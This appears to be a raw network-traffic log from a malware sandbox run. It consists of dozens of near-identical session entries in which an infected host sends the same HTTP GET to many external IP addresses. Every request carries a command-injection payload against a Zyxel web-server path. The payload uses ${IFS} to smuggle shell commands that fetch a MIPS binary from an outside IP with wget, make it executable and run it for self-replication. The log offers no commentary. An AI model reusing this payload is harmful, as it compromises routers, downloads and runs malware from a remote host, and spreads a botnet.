                                                        Jan 28, 2024 10:13:08.719511032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8556192.168.2.144074283.249.183.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719531059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8557192.168.2.1449998194.173.243.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719559908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8558192.168.2.145574659.17.92.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719615936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8559192.168.2.144360251.55.241.65443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719640017 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8560192.168.2.144560074.207.147.218443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719671965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8561192.168.2.1455056126.207.52.47443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719713926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8562192.168.2.1440264180.29.45.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719738007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8563192.168.2.145168851.140.178.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719783068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8564192.168.2.1433250207.24.3.23443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719813108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8565192.168.2.143346645.165.132.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719841003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8566192.168.2.1436566212.17.242.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719893932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8567192.168.2.1447998218.124.102.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719922066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8568192.168.2.1445920197.176.74.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719964981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8569192.168.2.145547283.208.177.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.719990969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8570192.168.2.145613634.219.124.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.720031023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8571192.168.2.1452480133.91.139.69443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.720060110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8572192.168.2.1456770181.7.156.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726213932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8573192.168.2.145564035.248.217.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726234913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8574192.168.2.1459336116.247.182.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726263046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8575192.168.2.144077625.36.108.136443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726310015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8576192.168.2.1445808166.250.212.255443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726342916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8577192.168.2.1447632190.229.163.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726389885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8578192.168.2.1449224170.94.95.131443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726427078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8579192.168.2.144540299.88.77.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726465940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8580192.168.2.1457422145.203.94.170443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726495028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8581192.168.2.1457126176.239.251.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726550102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8582192.168.2.1442338184.35.61.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726574898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8583192.168.2.145951444.224.198.26443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726609945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8584192.168.2.145041425.98.60.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726636887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8585192.168.2.144637648.23.42.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726705074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8586192.168.2.1445250187.58.231.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726732969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8587192.168.2.145238469.231.60.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726778984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8588192.168.2.1435968201.161.85.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726805925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8589192.168.2.143533860.68.92.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726840019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8590192.168.2.1452264145.184.239.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726861000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8591192.168.2.143564653.248.96.96443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726916075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8592192.168.2.1456222206.152.123.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.726943970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8593192.168.2.1453914117.201.145.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727016926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8594192.168.2.1456278190.55.25.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727026939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8595192.168.2.144723479.226.112.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727078915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8596192.168.2.1447162178.128.4.161443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727117062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8597192.168.2.144104683.104.249.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727148056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8598192.168.2.144271495.57.57.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:08.727181911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8599192.168.2.1441884147.80.234.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734767914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8600192.168.2.145861827.86.57.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734795094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8601192.168.2.1451878217.192.186.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734834909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8602192.168.2.146013480.37.245.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734885931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8603192.168.2.1441556203.159.82.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734944105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8604192.168.2.143659231.37.96.172443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734955072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8605192.168.2.1438218182.63.132.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.734989882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8606192.168.2.1440896202.29.129.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735042095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8607192.168.2.1439270122.183.114.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735060930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8608192.168.2.1453582208.43.148.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735110998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8609192.168.2.1443596197.85.252.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735166073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8610192.168.2.1457518184.182.148.40443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735196114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8611192.168.2.14404302.20.86.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735227108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8612192.168.2.1451468149.188.4.159443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735270023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8613192.168.2.145523443.9.240.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735317945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8614192.168.2.14498565.140.144.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735352039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8615192.168.2.146059024.138.243.66443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:09.735374928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        8616192.168.2.145800095.10.201.202443
                                                        TimestampBytes transferredDirectionData
